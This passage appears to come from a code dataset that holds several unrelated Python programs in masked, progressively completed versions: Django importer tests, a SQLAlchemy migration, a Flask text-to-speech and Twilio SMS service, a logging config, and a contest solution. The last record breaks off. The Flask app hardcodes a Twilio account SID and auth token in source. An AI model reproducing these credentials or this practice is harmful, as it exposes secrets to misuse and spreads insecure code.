CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_collection_item_asstes_no_db_entry(\n self, mock_get, mock_save\n ):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n # Arrange\n mock_resp_page = MockResponse({\"pagination\": {\"total\": 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [\n mock_resp_page,\n mock_page1_result,\n mock_page2_result,\n mock_resp_item_urls,\n ]\n mock_save.return_value = None\n\n # Act\n download_write_collection_item_assets(self.name, self.project, self.url)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(\n collection_task=ctd, collection_item_identifier=self.item_id\n )\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = \"branch-rickey-papers\"\n self.project = \"test-project\"\n self.item_id = \"mss37820001\"\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n # Arrange\n\n collection = {\n \"collection_name\": self.name,\n \"collection_slug\": slugify(self.name),\n \"collection_task_id\": \"123\",\n \"subcollection_name\": self.project,\n \"subcollection_slug\": slugify(self.project),\n }\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n\n # Act\n download_write_item_assets(self.name, self.project, self.item_id)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(\n collection_task=ctd, collection_item_identifier=self.item_id\n )\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch(\"importer.tasks.get_save_item_assets\")\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n # Arrange\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n\n # Act\n download_write_item_assets(self.name, self.project, self.item_id)\n\n ctd = CollectionTaskDetails.objects.get(\n collection_slug=self.name, subcollection_slug=self.project\n )\n ciac = CollectionItemAssetCount.objects.get(\n collection_task=ctd, collection_item_identifier=self.item_id\n )\n\n # Assert\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-ids": [
16,
25,
31,
33,
38
]
}
|
[
16,
25,
31,
33,
38
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
meta = MetaData()
table = Table('accesses', meta, Column('id', BigInteger, primary_key=True,
nullable=False), Column('uuid', String(255), nullable=False), Column(
'created_at', DateTime))
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
<|reserved_special_token_1|>
from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table('accesses', meta, Column('id', BigInteger, primary_key=True,
nullable=False), Column('uuid', String(255), nullable=False), Column(
'created_at', DateTime))
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
<|reserved_special_token_1|>
from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table(
'accesses', meta,
Column('id', BigInteger, primary_key=True, nullable=False),
Column('uuid', String(255), nullable=False),
Column('created_at', DateTime),
)
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
|
flexible
|
{
"blob_id": "6154979cd2853dd2bd26d1ae5df7365efa0141c2",
"index": 441,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-3": "<mask token>\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-4": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-5": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\n\nmeta = MetaData()\ntable = Table(\n 'accesses', meta,\n Column('id', BigInteger, primary_key=True, nullable=False),\n Column('uuid', String(255), nullable=False),\n Column('created_at', DateTime),\n)\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from flask import Flask, jsonify, request, send_file, render_template
from flask_cors import CORS
from twilio.rest import Client
import autocomplete
from gtts import gTTS
import os
# Set up the model.
autocomplete.load()
app = Flask(__name__)
CORS(app)
# The application
@app.route("/")
def index():
return render_template("index.html")
# Create a class for custom error messages (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).
class InvalidUsage(Exception):
status_code = 400
# Initialize the InvalidUsage exception.
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
# Convert the exception information into a dictionary.
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
# Register the custom exception with the error handler (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).
@app.errorhandler(InvalidUsage)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
# Converts English text to speech.
@app.route('/convert_text_to_speech', methods=['POST'])
def convert_text_to_speech():
# Check to see if the required parameters are present.
if 'text_to_convert' not in request.values.keys():
raise InvalidUsage("No text included for conversion", status_code = 400)
# Send the post request.
tts = gTTS(text=request.values['text_to_convert'], lang='en')
tts.save('converted_text.mp3')
os.system('start converted_text.mp3')
# Return the sound file.
return send_file('converted_text.mp3', mimetype='audio/mpeg')
# Get suggestions for words that the user typed in.
@app.route('/get_suggestion', methods=['GET','POST'])
def get_suggestion():
# Raise an exception if the required parameters are not specified.
if "words" not in request.values.keys():
raise InvalidUsage("No words were specified for prediction.", status_code = 400)
# Predict the next word.
text = request.values['words']
prediction = [];
if len(text.split(" ")) > 1:
prediction = autocomplete.split_predict(text, 10)
else:
prediction = autocomplete.predict_currword(text, 10)
return jsonify(prediction)
# Adds text message support to allow Don to send text messages.
@app.route('/send_text', methods=['GET', 'POST'])
def send_text():
# Raise an exception if the required parameters are not specified.
if "text" not in request.values.keys():
raise InvalidUsage("The text message was not found in the request.", status_code = 400)
if "to" not in request.values.keys():
raise InvalidUsage("The to-number was not found in the request", status_code = 400)
# Extract the required information from the request body.
text = request.values['text']
to_number = request.values['to']
# Set up the account credentials - in a production project, this would be placed in a "secrets" file.
account_sid = "ACbbd2cff98bcbbad08f76b03701a0f2d9"
auth_token = "7d786ff14c6b4572a6e8e78f8ad6aee5"
# Send the text message.
client = Client(account_sid, auth_token)
message = client.messages.create(
from_="+12267992139",
to=to_number,
body=text)
return jsonify({"to":to_number, "message":message.body, "error code":message.error_code})
|
normal
|
{
"blob_id": "8980ac4db2657d3dbd2b70b33a4d13a077d4590e",
"index": 2266,
"step-1": "<mask token>\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n<mask token>\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-2": "<mask token>\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n if 'text_to_convert' not in request.values.keys():\n raise InvalidUsage('No text included for conversion', status_code=400)\n tts = gTTS(text=request.values['text_to_convert'], lang='en')\n tts.save('converted_text.mp3')\n os.system('start converted_text.mp3')\n return send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-3": "<mask token>\nautocomplete.load()\n<mask token>\nCORS(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n if 'text_to_convert' not in request.values.keys():\n raise InvalidUsage('No text included for conversion', status_code=400)\n tts = gTTS(text=request.values['text_to_convert'], lang='en')\n tts.save('converted_text.mp3')\n os.system('start converted_text.mp3')\n return send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-4": "<mask token>\nautocomplete.load()\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n if 'text_to_convert' not in request.values.keys():\n raise InvalidUsage('No text included for conversion', status_code=400)\n tts = gTTS(text=request.values['text_to_convert'], lang='en')\n tts.save('converted_text.mp3')\n os.system('start converted_text.mp3')\n return send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n\n@app.route('/get_suggestion', methods=['GET', 'POST'])\ndef get_suggestion():\n if 'words' not in request.values.keys():\n raise InvalidUsage('No words were specified for prediction.',\n status_code=400)\n text = request.values['words']\n prediction = []\n if len(text.split(' ')) > 1:\n prediction = autocomplete.split_predict(text, 10)\n else:\n prediction = autocomplete.predict_currword(text, 10)\n return jsonify(prediction)\n\n\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n if 'text' not in request.values.keys():\n raise InvalidUsage('The text message was not found in the request.',\n status_code=400)\n if 'to' not in request.values.keys():\n raise InvalidUsage('The to-number was not found in the request',\n status_code=400)\n text = request.values['text']\n to_number = request.values['to']\n account_sid = 'ACbbd2cff98bcbbad08f76b03701a0f2d9'\n auth_token = '7d786ff14c6b4572a6e8e78f8ad6aee5'\n client = Client(account_sid, auth_token)\n message = client.messages.create(from_='+12267992139', to=to_number,\n body=text)\n return jsonify({'to': to_number, 'message': message.body, 'error code':\n message.error_code})\n",
"step-5": "from flask import Flask, jsonify, request, send_file, render_template\nfrom flask_cors import CORS\nfrom twilio.rest import Client\nimport autocomplete\nfrom gtts import gTTS\nimport os\n\n# Set up the model.\nautocomplete.load()\napp = Flask(__name__)\nCORS(app)\n\n# The application\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\n# Create a class for custom error messages (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).\nclass InvalidUsage(Exception):\n\tstatus_code = 400\n\n\t# Initialize the InvalidUsage exception.\n\tdef __init__(self, message, status_code=None, payload=None):\n\t\tException.__init__(self)\n\t\tself.message = message\n\t\tif status_code is not None:\n\t\t\tself.status_code = status_code\n\t\tself.payload = payload\n\n\t# Convert the exception information into a dictionary.\n\tdef to_dict(self):\n\t\trv = dict(self.payload or ())\n\t\trv['message'] = self.message\n\t\treturn rv\n\n# Register the custom exception with the error handler (reference: http://flask.pocoo.org/docs/0.12/patterns/apierrors/).\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n\tresponse = jsonify(error.to_dict())\n\tresponse.status_code = error.status_code\n\treturn response\n\n# Converts English text to speech.\n@app.route('/convert_text_to_speech', methods=['POST'])\ndef convert_text_to_speech():\n\t# Check to see if the required parameters are present.\n\tif 'text_to_convert' not in request.values.keys():\n\t\traise InvalidUsage(\"No text included for conversion\", status_code = 400)\n\t\t\n\t# Send the post request.\n\ttts = gTTS(text=request.values['text_to_convert'], lang='en')\n\ttts.save('converted_text.mp3')\n\tos.system('start converted_text.mp3')\n\t\n\t# Return the sound file.\n\treturn send_file('converted_text.mp3', mimetype='audio/mpeg')\n\n# Get suggestions for words that the user typed in.\n@app.route('/get_suggestion', methods=['GET','POST'])\ndef get_suggestion():\n\t# Raise an exception if the required parameters are not specified.\n\tif \"words\" not in request.values.keys():\n\t\traise InvalidUsage(\"No words were specified for prediction.\", status_code = 400)\n\t\n\t# Predict the next word.\n\ttext = request.values['words']\n\tprediction = [];\n\tif len(text.split(\" \")) > 1:\n\t\tprediction = autocomplete.split_predict(text, 10)\n\telse:\n\t\tprediction = autocomplete.predict_currword(text, 10)\n\t\t\n\treturn jsonify(prediction)\n\t\n# Adds text message support to allow Don to send text messages.\n@app.route('/send_text', methods=['GET', 'POST'])\ndef send_text():\n\t# Raise an exception if the required parameters are not specified.\n\tif \"text\" not in request.values.keys():\n\t\traise InvalidUsage(\"The text message was not found in the request.\", status_code = 400)\n\tif \"to\" not in request.values.keys():\n\t\traise InvalidUsage(\"The to-number was not found in the request\", status_code = 400)\n\t\n\t# Extract the required information from the request body.\n\ttext = request.values['text']\n\tto_number = request.values['to']\n\t\n\t# Set up the account credentials - in a production project, this would be placed in a \"secrets\" file.\n\taccount_sid = \"ACbbd2cff98bcbbad08f76b03701a0f2d9\"\n\tauth_token = \"7d786ff14c6b4572a6e8e78f8ad6aee5\"\n\t\n\t# Send the text message.\n\tclient = Client(account_sid, auth_token)\n\tmessage = client.messages.create(\n\t\tfrom_=\"+12267992139\",\n\t\tto=to_number,\n\t\tbody=text)\n\n\treturn jsonify({\"to\":to_number, \"message\":message.body, \"error code\":message.error_code})\n\t",
"step-ids": [
7,
9,
10,
11,
13
]
}
|
[
7,
9,
10,
11,
13
] |
import logging
import os
import logzero
from gunicorn.glogging import Logger
_log_level = os.environ.get("LOG_LEVEL", "info").upper()
log_level = getattr(logging, _log_level)
log_format = "%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s"
formatter = logzero.LogFormatter(fmt=log_format)
logger_args = dict(level=log_level, formatter=formatter)
logzero.__name__ = ""
logzero.setup_logger(**logger_args)
logzero.setup_default_logger(**logger_args)
logger = logzero.setup_logger("alertmanager_telegram", **logger_args)
class GunicornLogger(Logger):
def __init__(self, cfg):
super().__init__(cfg)
self.error_log = logzero.setup_logger("gunicorn", **logger_args)
|
normal
|
{
"blob_id": "b8b50ef021c4b25edbab355e1db5d62d3c5a28ad",
"index": 7257,
"step-1": "<mask token>\n\n\nclass GunicornLogger(Logger):\n <mask token>\n",
"step-2": "<mask token>\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\n<mask token>\n\n\nclass GunicornLogger(Logger):\n\n def __init__(self, cfg):\n super().__init__(cfg)\n self.error_log = logzero.setup_logger('gunicorn', **logger_args)\n",
"step-3": "<mask token>\n_log_level = os.environ.get('LOG_LEVEL', 'info').upper()\nlog_level = getattr(logging, _log_level)\nlog_format = (\n '%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s'\n )\nformatter = logzero.LogFormatter(fmt=log_format)\nlogger_args = dict(level=log_level, formatter=formatter)\nlogzero.__name__ = ''\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\nlogger = logzero.setup_logger('alertmanager_telegram', **logger_args)\n\n\nclass GunicornLogger(Logger):\n\n def __init__(self, cfg):\n super().__init__(cfg)\n self.error_log = logzero.setup_logger('gunicorn', **logger_args)\n",
"step-4": "import logging\nimport os\nimport logzero\nfrom gunicorn.glogging import Logger\n_log_level = os.environ.get('LOG_LEVEL', 'info').upper()\nlog_level = getattr(logging, _log_level)\nlog_format = (\n '%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s'\n )\nformatter = logzero.LogFormatter(fmt=log_format)\nlogger_args = dict(level=log_level, formatter=formatter)\nlogzero.__name__ = ''\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\nlogger = logzero.setup_logger('alertmanager_telegram', **logger_args)\n\n\nclass GunicornLogger(Logger):\n\n def __init__(self, cfg):\n super().__init__(cfg)\n self.error_log = logzero.setup_logger('gunicorn', **logger_args)\n",
"step-5": "import logging\nimport os\n\nimport logzero\nfrom gunicorn.glogging import Logger\n\n_log_level = os.environ.get(\"LOG_LEVEL\", \"info\").upper()\nlog_level = getattr(logging, _log_level)\nlog_format = \"%(color)s[%(levelname)1.1s %(asctime)s %(name)s]%(end_color)s %(message)s\"\n\nformatter = logzero.LogFormatter(fmt=log_format)\nlogger_args = dict(level=log_level, formatter=formatter)\n\nlogzero.__name__ = \"\"\nlogzero.setup_logger(**logger_args)\nlogzero.setup_default_logger(**logger_args)\nlogger = logzero.setup_logger(\"alertmanager_telegram\", **logger_args)\n\n\nclass GunicornLogger(Logger):\n def __init__(self, cfg):\n super().__init__(cfg)\n\n self.error_log = logzero.setup_logger(\"gunicorn\", **logger_args)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.setrecursionlimit(10 ** 7)
<|reserved_special_token_0|>
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sysread = sys.stdin.readline
read = sys.stdin.read
<|reserved_special_token_0|>
sys.setrecursionlimit(10 ** 7)
<|reserved_special_token_0|>
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
import sys
sysread = sys.stdin.readline
read = sys.stdin.read
from heapq import heappop, heappush
from collections import defaultdict
sys.setrecursionlimit(10 ** 7)
import math
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
# coding: utf-8
import sys
#from operator import itemgetter
sysread = sys.stdin.readline
read = sys.stdin.read
from heapq import heappop, heappush
from collections import defaultdict
sys.setrecursionlimit(10**7)
import math
#from itertools import product#accumulate, combinations, product
#import bisect# lower_bound etc
#import numpy as np
#from copy import deepcopy
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2*i]
b = AB[2*i+1]
if a== 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a,b)
if a / b > 0 :v = 1
else: v = -1
A_B.append((abs(a//tmp), v * abs(b//tmp)))
comb_dict = defaultdict(lambda:[0,0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[(ai,bi)][0] += 1
else:
comb_dict[(bi, -ai)][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a,b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a,b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero-1
print(ret%mod)
if __name__ == "__main__":
run()
|
flexible
|
{
"blob_id": "f73a3bd7665ac9cc90085fcac2530c93bef69d3d",
"index": 6705,
